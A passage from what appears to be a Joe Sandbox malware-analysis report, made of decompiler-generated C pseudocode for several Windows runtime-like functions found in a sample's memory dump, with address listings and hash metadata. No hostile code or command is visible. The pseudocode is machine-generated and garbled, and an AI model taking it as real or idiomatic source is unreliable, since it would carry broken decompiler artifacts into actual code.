									E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
									_t102 = _v36;
								}
								 *_t102 = 1;
								asm("lock xadd [edi], eax");
								if(__eflags == 0) {
									_t28 = _t102 + 4; // 0xffffffff
									_push( *_t28);
									E1D782A80();
									E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
								}
								continue;
							}
							_t15 = _t104 + 0x10; // 0x2001ab2c
							_t93 = _t108 + 0x18;
							_t17 = _t104 + 0xe; // 0xab2c5002
							 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
							_t85 = 6;
							 *((short*)(_t108 + 0x18)) = _t85;
							_t87 = E1D7741BB(_t108 + 0x18,  *_t17 & 0x0000ffff, __eflags, _t108 + 0x10);
							__eflags = _t87;
							if(_t87 < 0) {
								goto L5;
							}
							 *((char*)(_t108 + 0xe)) = 1;
							goto L14;
						}
						__eflags = _t53 - 0xc000026e;
						if(__eflags != 0) {
							goto L5;
						}
						goto L11;
					} else {
						goto L5;
					}
				}
				return _t49;
			}

























                                                                                                                              0x1d737c85
                                                                                                                              0x1d737c8d
                                                                                                                              0x1d737c90
                                                                                                                              0x1d737c93
                                                                                                                              0x1d737c97
                                                                                                                              0x1d737c9a
                                                                                                                              0x1d737c9f
                                                                                                                              0x1d737ca4
                                                                                                                              0x1d737cac
                                                                                                                              0x1d737ced
                                                                                                                              0x1d737cef
                                                                                                                              0x1d737cef
                                                                                                                              0x1d737cae
                                                                                                                              0x1d737cb1
                                                                                                                              0x1d737cb4
                                                                                                                              0x1d737cb9
                                                                                                                              0x1d737cbd
                                                                                                                              0x1d737cc7
                                                                                                                              0x1d737ce4
                                                                                                                              0x1d737ce4
                                                                                                                              0x00000000
                                                                                                                              0x1d737ce4
                                                                                                                              0x1d737cce
                                                                                                                              0x1d737cd4
                                                                                                                              0x1d79b0a6
                                                                                                                              0x1d79b0a7
                                                                                                                              0x1d79b0a8
                                                                                                                              0x1d79b0a9
                                                                                                                              0x1d79b0aa
                                                                                                                              0x1d79b0af
                                                                                                                              0x1d79b0b0
                                                                                                                              0x1d79b0b1
                                                                                                                              0x1d79b0b2
                                                                                                                              0x1d79b0b3
                                                                                                                              0x1d79b0b3
                                                                                                                              0x1d79b0b6
                                                                                                                              0x1d79b0bb
                                                                                                                              0x1d79b0bd
                                                                                                                              0x1d79b231
                                                                                                                              0x1d79b235
                                                                                                                              0x1d79b241
                                                                                                                              0x1d79b246
                                                                                                                              0x1d79b247
                                                                                                                              0x1d79b24a
                                                                                                                              0x1d79b24a
                                                                                                                              0x00000000
                                                                                                                              0x1d79b235
                                                                                                                              0x1d79b0c3
                                                                                                                              0x1d79b0c8
                                                                                                                              0x1d79b0d5
                                                                                                                              0x1d79b0d5
                                                                                                                              0x1d79b0de
                                                                                                                              0x1d79b0de
                                                                                                                              0x1d79b0e1
                                                                                                                              0x1d79b0eb
                                                                                                                              0x1d79b0ed
                                                                                                                              0x1d79b11d
                                                                                                                              0x1d79b123
                                                                                                                              0x1d79b132
                                                                                                                              0x1d79b138
                                                                                                                              0x1d79b13c
                                                                                                                              0x1d79b141
                                                                                                                              0x1d79b147
                                                                                                                              0x1d79b1a8
                                                                                                                              0x1d79b1ad
                                                                                                                              0x1d79b1b1
                                                                                                                              0x1d79b1b7
                                                                                                                              0x1d79b1bb
                                                                                                                              0x1d79b1be
                                                                                                                              0x1d79b1c1
                                                                                                                              0x1d79b1c4
                                                                                                                              0x1d79b1c7
                                                                                                                              0x1d79b1ca
                                                                                                                              0x1d79b1cc
                                                                                                                              0x1d79b1cf
                                                                                                                              0x1d79b1d2
                                                                                                                              0x1d79b1d2
                                                                                                                              0x1d79b1d7
                                                                                                                              0x1d79b1dc
                                                                                                                              0x1d79b1e3
                                                                                                                              0x1d79b1e7
                                                                                                                              0x1d79b1e9
                                                                                                                              0x1d79b1e9
                                                                                                                              0x1d79b1ec
                                                                                                                              0x1d79b1fd
                                                                                                                              0x1d79b202
                                                                                                                              0x1d79b202
                                                                                                                              0x1d79b206
                                                                                                                              0x1d79b20a
                                                                                                                              0x1d79b20b
                                                                                                                              0x1d79b20d
                                                                                                                              0x1d79b20d
                                                                                                                              0x1d79b210
                                                                                                                              0x1d79b221
                                                                                                                              0x1d79b226
                                                                                                                              0x1d79b226
                                                                                                                              0x1d79b22a
                                                                                                                              0x00000000
                                                                                                                              0x1d79b22a
                                                                                                                              0x1d79b149
                                                                                                                              0x1d79b14e
                                                                                                                              0x1d79b155
                                                                                                                              0x1d79b159
                                                                                                                              0x1d79b15b
                                                                                                                              0x1d79b15b
                                                                                                                              0x1d79b15e
                                                                                                                              0x1d79b16f
                                                                                                                              0x1d79b174
                                                                                                                              0x1d79b174
                                                                                                                              0x1d79b178
                                                                                                                              0x1d79b180
                                                                                                                              0x1d79b184
                                                                                                                              0x1d79b18a
                                                                                                                              0x1d79b18a
                                                                                                                              0x1d79b18d
                                                                                                                              0x1d79b19e
                                                                                                                              0x1d79b19e
                                                                                                                              0x00000000
                                                                                                                              0x1d79b184
                                                                                                                              0x1d79b0ef
                                                                                                                              0x1d79b0f2
                                                                                                                              0x1d79b0f6
                                                                                                                              0x1d79b0fc
                                                                                                                              0x1d79b100
                                                                                                                              0x1d79b101
                                                                                                                              0x1d79b10b
                                                                                                                              0x1d79b110
                                                                                                                              0x1d79b112
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79b118
                                                                                                                              0x00000000
                                                                                                                              0x1d79b118
                                                                                                                              0x1d79b0ca
                                                                                                                              0x1d79b0cf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d737cd4
                                                                                                                              0x1d737cec

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e80bb3387f1c556bf84b0ceefcfd897e41aa255f037d8195d7d4d26da2acea90
                                                                                                                              • Instruction ID: 64a573dac546343a05dfa5f2265668fc4ad4a0ef330c209bc058b1e2492d3af2
                                                                                                                              • Opcode Fuzzy Hash: e80bb3387f1c556bf84b0ceefcfd897e41aa255f037d8195d7d4d26da2acea90
                                                                                                                              • Instruction Fuzzy Hash: EC519E75108342ABC7228F28D884B6BB7E4FF44736F15491EE59987662E734F844CBA3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7694FA Relevance: .2, Instructions: 160COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 66%
                                                                                                                              			E1D7694FA(signed int __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				signed int _v113;
				void* _v120;
				char _v124;
				intOrPtr _v128;
				intOrPtr* _v132;
				intOrPtr* _v136;
				signed int _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t52;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t64;
				void* _t73;
				signed int _t80;
				signed int _t81;
				signed int _t85;
				intOrPtr* _t91;
				intOrPtr* _t92;
				signed int _t93;

				_t90 = __edx;
				_t85 = __ecx;
				_v8 =  *0x1d83b370 ^ _t93;
				_t92 = _a8;
				_t91 = __edx;
				_v140 = __ecx;
				_v136 = __edx;
				if(__edx == 0) {
					L31:
					 *_t92 = 0xc000005a;
					L32:
					_t52 = 0;
					L8:
					return E1D784B50(_t52, _t80, _v8 ^ _t93, _t90, _t91, _t92);
				}
				_t80 = _a4;
				if(_t80 != 0) {
					_push( &_v120);
					_push(8);
					_push(0xffffffff);
					_t55 = E1D783C30();
					 *_t92 = _t55;
					if(_t55 < 0) {
						goto L32;
					}
					L3:
					_v128 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
					_push( &_v124);
					_push(0x4c);
					_push( &_v92);
					_push(1);
					_push(_v120);
					_t60 = E1D782BC0();
					 *_t92 = _t60;
					if(_t60 < 0) {
						L27:
						if(_t80 != 0) {
							_push(_v120);
							E1D782A80();
						}
						goto L32;
					}
					if(E1D768600(_t91, _v92) == 0) {
						_push( &_v124);
						_push(0);
						_push(0);
						_push(2);
						_push(_v120);
						_t64 = E1D782BC0();
						 *_t92 = _t64;
						if(_t64 >= 0 || _t64 == 0xc0000023) {
							_t91 = E1D755D90(_t85, _v128, 0, _v124);
							if(_t91 == 0) {
								 *_t92 = 0xc0000017;
								goto L27;
							}
							_push( &_v124);
							_push(_v124);
							_push(_t91);
							_push(2);
							_push(_v120);
							 *_t92 = E1D782BC0();
							if(_t80 != 0) {
								_push(_v120);
								E1D782A80();
							}
							if( *_t92 < 0) {
								_t80 = 0;
								goto L21;
							} else {
								_t81 = 0;
								if( *_t91 <= 0) {
									L30:
									E1D753BC0(_v128, 0, _t91);
									_v100 = _v100 & 0x00000000;
									_v96 = _v96 & 0x00000000;
									_push( &_v113);
									_v104 = 0x12;
									_push( &_v112);
									_push(_v140);
									_t80 = 1;
									_v112 = 1;
									_v108 = 1;
									_t73 = E1D783D20();
									_t47 =  &_v113;
									 *_t47 = _v113 & (_t85 & 0xffffff00 | _t73 < 0x00000000) - 0x00000001;
									if( *_t47 != 0) {
										L7:
										_t52 = _t80;
										goto L8;
									}
									goto L31;
								}
								_t21 = _t91 + 4; // 0x4
								_t74 = _t21;
								_v132 = _t21;
								while(E1D768600(_v136,  *_t74) == 0) {
									_t81 = _t81 + 1;
									_t74 = _v132 + 8;
									_v132 = _v132 + 8;
									if(_t81 <  *_t91) {
										continue;
									}
									goto L30;
								}
								if(( *(_t91 + 8 + _t81 * 8) & 0x00000018) != 8) {
									goto L30;
								}
								_t80 = 1;
								L21:
								E1D753BC0(_v128, 0, _t91);
								goto L7;
							}
						} else {
							goto L27;
						}
					}
					if(_t80 != 0) {
						_push(_v120);
						E1D782A80();
					}
					_t80 = 1;
					goto L7;
				}
				_v120 = __ecx;
				goto L3;
			}































                                                                                                                              0x1d7694fa
                                                                                                                              0x1d7694fa
                                                                                                                              0x1d76950c
                                                                                                                              0x1d769511
                                                                                                                              0x1d769517
                                                                                                                              0x1d769519
                                                                                                                              0x1d76951f
                                                                                                                              0x1d769527
                                                                                                                              0x1d7ada8b
                                                                                                                              0x1d7ada8b
                                                                                                                              0x1d7ada91
                                                                                                                              0x1d7ada91
                                                                                                                              0x1d76957f
                                                                                                                              0x1d76958d
                                                                                                                              0x1d76958d
                                                                                                                              0x1d76952d
                                                                                                                              0x1d769532
                                                                                                                              0x1d7ada02
                                                                                                                              0x1d7ada03
                                                                                                                              0x1d7ada05
                                                                                                                              0x1d7ada07
                                                                                                                              0x1d7ada0c
                                                                                                                              0x1d7ada10
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76953b
                                                                                                                              0x1d769544
                                                                                                                              0x1d76954a
                                                                                                                              0x1d76954b
                                                                                                                              0x1d769550
                                                                                                                              0x1d769551
                                                                                                                              0x1d769553
                                                                                                                              0x1d769556
                                                                                                                              0x1d76955b
                                                                                                                              0x1d76955f
                                                                                                                              0x1d7ada2a
                                                                                                                              0x1d7ada2c
                                                                                                                              0x1d7ada2e
                                                                                                                              0x1d7ada31
                                                                                                                              0x1d7ada31
                                                                                                                              0x00000000
                                                                                                                              0x1d7ada2c
                                                                                                                              0x1d769570
                                                                                                                              0x1d769593
                                                                                                                              0x1d769594
                                                                                                                              0x1d769596
                                                                                                                              0x1d769598
                                                                                                                              0x1d76959a
                                                                                                                              0x1d76959d
                                                                                                                              0x1d7695a2
                                                                                                                              0x1d7695a6
                                                                                                                              0x1d7695c0
                                                                                                                              0x1d7695c4
                                                                                                                              0x1d7ada24
                                                                                                                              0x00000000
                                                                                                                              0x1d7ada24
                                                                                                                              0x1d7695cd
                                                                                                                              0x1d7695ce
                                                                                                                              0x1d7695d1
                                                                                                                              0x1d7695d2
                                                                                                                              0x1d7695d4
                                                                                                                              0x1d7695dc
                                                                                                                              0x1d7695e0
                                                                                                                              0x1d7ada38
                                                                                                                              0x1d7ada3b
                                                                                                                              0x1d7ada3b
                                                                                                                              0x1d7695e9
                                                                                                                              0x1d769640
                                                                                                                              0x00000000
                                                                                                                              0x1d7695eb
                                                                                                                              0x1d7695eb
                                                                                                                              0x1d7695ef
                                                                                                                              0x1d7ada45
                                                                                                                              0x1d7ada4b
                                                                                                                              0x1d7ada50
                                                                                                                              0x1d7ada57
                                                                                                                              0x1d7ada5d
                                                                                                                              0x1d7ada61
                                                                                                                              0x1d7ada68
                                                                                                                              0x1d7ada69
                                                                                                                              0x1d7ada6f
                                                                                                                              0x1d7ada70
                                                                                                                              0x1d7ada73
                                                                                                                              0x1d7ada76
                                                                                                                              0x1d7ada82
                                                                                                                              0x1d7ada82
                                                                                                                              0x1d7ada85
                                                                                                                              0x1d76957d
                                                                                                                              0x1d76957d
                                                                                                                              0x00000000
                                                                                                                              0x1d76957d
                                                                                                                              0x00000000
                                                                                                                              0x1d7ada85
                                                                                                                              0x1d7695f5
                                                                                                                              0x1d7695f5
                                                                                                                              0x1d7695f8
                                                                                                                              0x1d7695fb
                                                                                                                              0x1d76960f
                                                                                                                              0x1d769610
                                                                                                                              0x1d769613
                                                                                                                              0x1d769618
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76961a
                                                                                                                              0x1d769627
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76962f
                                                                                                                              0x1d769630
                                                                                                                              0x1d769636
                                                                                                                              0x00000000
                                                                                                                              0x1d769636
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7695a6
                                                                                                                              0x1d769574
                                                                                                                              0x1d7ada17
                                                                                                                              0x1d7ada1a
                                                                                                                              0x1d7ada1a
                                                                                                                              0x1d76957c
                                                                                                                              0x00000000
                                                                                                                              0x1d76957c
                                                                                                                              0x1d769538
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 2dda7b5c8f7f34cf0dded8568d5c53bfa8afd2d7c9321b5e312f1159e87ec40d
                                                                                                                              • Instruction ID: 647f40afcbaef246b2aa6511d015d4425c0a79b9c2360302a0334782e17d2685
                                                                                                                              • Opcode Fuzzy Hash: 2dda7b5c8f7f34cf0dded8568d5c53bfa8afd2d7c9321b5e312f1159e87ec40d
                                                                                                                              • Instruction Fuzzy Hash: 0551C875904209AFEB218FB4CC85BDDBBB5FF05320F20412AEA94A71A2F7719904DF12
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D743EE2 Relevance: .1, Instructions: 147COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 94%
                                                                                                                              			E1D743EE2(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t101 = _t98 + 0xc8;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E1D76AB30(E1D776010(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E1D753C40() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E1D8150B7(_t102, _t98);
						}
						L1D752330(_t58, _v44);
						E1D7479D1(_t102, _t98);
						E1D7477F9(_t102, _v5);
						return E1D7524D0(_v44);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1d8367f0; // 0x0
							_v28 = _t67;
							_t68 =  *0x1d8367f4; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1d8367f0; // 0x0
						_t105 = _v28;
						_t80 =  *0x1d8367f4; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t101 = _v40 + 0xc8;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}






































                                                                                                                              0x1d743ee2
                                                                                                                              0x1d743ee9
                                                                                                                              0x1d743eee
                                                                                                                              0x1d743ef0
                                                                                                                              0x1d743ef3
                                                                                                                              0x1d743ef7
                                                                                                                              0x1d743efa
                                                                                                                              0x1d743f0b
                                                                                                                              0x1d744049
                                                                                                                              0x1d744049
                                                                                                                              0x1d744049
                                                                                                                              0x1d743f0f
                                                                                                                              0x1d743f14
                                                                                                                              0x1d743f29
                                                                                                                              0x1d743f32
                                                                                                                              0x1d743f35
                                                                                                                              0x1d743f3d
                                                                                                                              0x1d744050
                                                                                                                              0x1d744057
                                                                                                                              0x1d744059
                                                                                                                              0x1d74405c
                                                                                                                              0x1d74405e
                                                                                                                              0x1d744060
                                                                                                                              0x1d744063
                                                                                                                              0x1d744065
                                                                                                                              0x1d744068
                                                                                                                              0x1d744068
                                                                                                                              0x00000000
                                                                                                                              0x1d743f43
                                                                                                                              0x1d743f45
                                                                                                                              0x1d7a002f
                                                                                                                              0x1d7a0034
                                                                                                                              0x1d7a0036
                                                                                                                              0x1d743fde
                                                                                                                              0x1d743fe0
                                                                                                                              0x1d743fe3
                                                                                                                              0x1d743fe5
                                                                                                                              0x1d743fe7
                                                                                                                              0x1d743fea
                                                                                                                              0x1d743fec
                                                                                                                              0x1d7a003e
                                                                                                                              0x1d7a0041
                                                                                                                              0x1d7a0041
                                                                                                                              0x1d743ffd
                                                                                                                              0x1d743fff
                                                                                                                              0x1d744002
                                                                                                                              0x1d744009
                                                                                                                              0x1d7a0054
                                                                                                                              0x1d74400f
                                                                                                                              0x1d74400f
                                                                                                                              0x1d74400f
                                                                                                                              0x1d744017
                                                                                                                              0x1d74401a
                                                                                                                              0x1d7a0062
                                                                                                                              0x1d7a0062
                                                                                                                              0x1d744024
                                                                                                                              0x1d74402d
                                                                                                                              0x1d744037
                                                                                                                              0x1d744046
                                                                                                                              0x1d744046
                                                                                                                              0x1d743f4b
                                                                                                                              0x1d743f50
                                                                                                                              0x1d743f50
                                                                                                                              0x1d743f55
                                                                                                                              0x1d743f55
                                                                                                                              0x1d743f5a
                                                                                                                              0x1d743f5d
                                                                                                                              0x1d743f62
                                                                                                                              0x1d743f6f
                                                                                                                              0x1d743f72
                                                                                                                              0x1d743f78
                                                                                                                              0x1d743f78
                                                                                                                              0x1d743f7a
                                                                                                                              0x1d743f80
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d744070
                                                                                                                              0x1d744070
                                                                                                                              0x1d743f86
                                                                                                                              0x1d743f86
                                                                                                                              0x1d743f89
                                                                                                                              0x1d743f90
                                                                                                                              0x1d743f96
                                                                                                                              0x1d743f9c
                                                                                                                              0x1d743fa1
                                                                                                                              0x1d743fa1
                                                                                                                              0x1d743faa
                                                                                                                              0x1d743faf
                                                                                                                              0x1d743fb2
                                                                                                                              0x1d743fb8
                                                                                                                              0x1d743fc6
                                                                                                                              0x1d743fc9
                                                                                                                              0x1d743fcc
                                                                                                                              0x1d743fce
                                                                                                                              0x1d743fd1
                                                                                                                              0x1d743fd3
                                                                                                                              0x1d743fd9
                                                                                                                              0x1d743fdb
                                                                                                                              0x00000000
                                                                                                                              0x1d743fdb

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f271b36f7a8c98891159992fedb69407c556bc5a7fe6bdf63760a2d00ebf1406
                                                                                                                              • Instruction ID: 5233720c5318be9fa908bd59a72adb6335ff4239c9ad21ea589e5e8c6b82952e
                                                                                                                              • Opcode Fuzzy Hash: f271b36f7a8c98891159992fedb69407c556bc5a7fe6bdf63760a2d00ebf1406
                                                                                                                              • Instruction Fuzzy Hash: 2751E375A00216DFCB06CF68C490A9EFBF1BF48324F21C65AD659AB355DB70AD40CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7E1889 Relevance: .1, Instructions: 143COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E1D7E1889(intOrPtr __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t52;
				signed int _t65;
				void* _t72;
				signed int _t73;
				signed short _t74;
				signed int _t78;
				void* _t79;
				short* _t84;
				signed int _t87;

				_v16 = __ecx;
				_t78 = 0;
				_v12 = __edx;
				_t65 = 0;
				_t84 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) == 0 || __edx == 0 || _a4 == 0) {
					_t87 = 0xc000000d;
					goto L26;
				} else {
					_t79 = 8;
					_push(0x2a);
					if(E1D73A121(0, _t79) != 0) {
						_t84 = E1D755D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t44);
						if(_t84 != 0) {
							_t70 = _v12;
							_t87 = 0;
							if(E1D73A0B8(0, _v12, _t84, _a4, _a8, 0, 0) != 0) {
								_t65 = E1D755D90(_t70,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xaa);
								if(_t65 != 0) {
									_t78 = 0;
									_t52 = 0;
									_v12 = 0;
									do {
										if(0 == _t52) {
											goto L22;
										}
										_t73 = _t52;
										if( *((intOrPtr*)(_t84 + 4 + _t73 * 8)) == _t78) {
											goto L22;
										}
										if( *(_t84 + _t73 * 8) <= _t78) {
											_t74 =  *(_t84 + 2 + _t73 * 8) & 0x0000ffff;
											if(_t74 < 0) {
												_t87 = 0xc00000e5;
												L26:
												if(_t65 != 0) {
													E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t78, _t65);
												}
												L28:
												if(_t84 != 0) {
													E1D73A093(_t84);
												}
												goto L30;
											}
											_t81 =  *((intOrPtr*)(_a4 + 0x18));
											_t73 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x18)) + 0xc)) + _t74 * 2));
											E1D785050(_t73,  &_v24,  *((intOrPtr*)(_t81 + 0x10)) + _t73 * 2);
											L20:
											_push(_t73);
											_t87 = E1D765497(_v16, _a4, 0,  &_v8, _v20);
											_t78 = 0;
											if(_t87 < 0) {
												goto L26;
											}
											_t52 = _v12;
											goto L22;
										}
										_v20 = _t65;
										_v24 = 0xaa0000;
										if(E1D764F40( *(_t84 + _t73 * 8) & 0x0000ffff,  &_v24) != 0) {
											goto L20;
										}
										_t87 = 0xc00000e5;
										_t78 = 0;
										goto L26;
										L22:
										_t52 = _t52 + 1;
										_t72 = 0x2a;
										_v12 = _t52;
									} while (_t52 < _t72);
									goto L26;
								}
								_t87 = 0xc0000017;
								goto L28;
							}
							_t87 = 0xc0000001;
							goto L28;
						}
						_t87 = 0xc0000017;
						goto L30;
					} else {
						_t87 = 0xc0000095;
						L30:
						return _t87;
					}
				}
			}

















                                                                                                                              0x1d7e1894
                                                                                                                              0x1d7e1897
                                                                                                                              0x1d7e1899
                                                                                                                              0x1d7e189c
                                                                                                                              0x1d7e18a0
                                                                                                                              0x1d7e18a4
                                                                                                                              0x1d7e19ef
                                                                                                                              0x00000000
                                                                                                                              0x1d7e18c3
                                                                                                                              0x1d7e18c5
                                                                                                                              0x1d7e18c6
                                                                                                                              0x1d7e18d2
                                                                                                                              0x1d7e18ef
                                                                                                                              0x1d7e18f3
                                                                                                                              0x1d7e18ff
                                                                                                                              0x1d7e190b
                                                                                                                              0x1d7e1917
                                                                                                                              0x1d7e1939
                                                                                                                              0x1d7e193d
                                                                                                                              0x1d7e1949
                                                                                                                              0x1d7e194b
                                                                                                                              0x1d7e194d
                                                                                                                              0x1d7e1950
                                                                                                                              0x1d7e1955
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e1957
                                                                                                                              0x1d7e195e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e1964
                                                                                                                              0x1d7e198b
                                                                                                                              0x1d7e1993
                                                                                                                              0x1d7e19e8
                                                                                                                              0x1d7e19f4
                                                                                                                              0x1d7e19f6
                                                                                                                              0x1d7e1a03
                                                                                                                              0x1d7e1a03
                                                                                                                              0x1d7e1a08
                                                                                                                              0x1d7e1a0a
                                                                                                                              0x1d7e1a0e
                                                                                                                              0x1d7e1a0e
                                                                                                                              0x00000000
                                                                                                                              0x1d7e1a0a
                                                                                                                              0x1d7e199b
                                                                                                                              0x1d7e19a1
                                                                                                                              0x1d7e19b0
                                                                                                                              0x1d7e19b5
                                                                                                                              0x1d7e19bb
                                                                                                                              0x1d7e19cb
                                                                                                                              0x1d7e19cd
                                                                                                                              0x1d7e19d1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e19d3
                                                                                                                              0x00000000
                                                                                                                              0x1d7e19d3
                                                                                                                              0x1d7e1969
                                                                                                                              0x1d7e196d
                                                                                                                              0x1d7e1980
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e1982
                                                                                                                              0x1d7e1987
                                                                                                                              0x00000000
                                                                                                                              0x1d7e19d6
                                                                                                                              0x1d7e19d8
                                                                                                                              0x1d7e19d9
                                                                                                                              0x1d7e19da
                                                                                                                              0x1d7e19dd
                                                                                                                              0x00000000
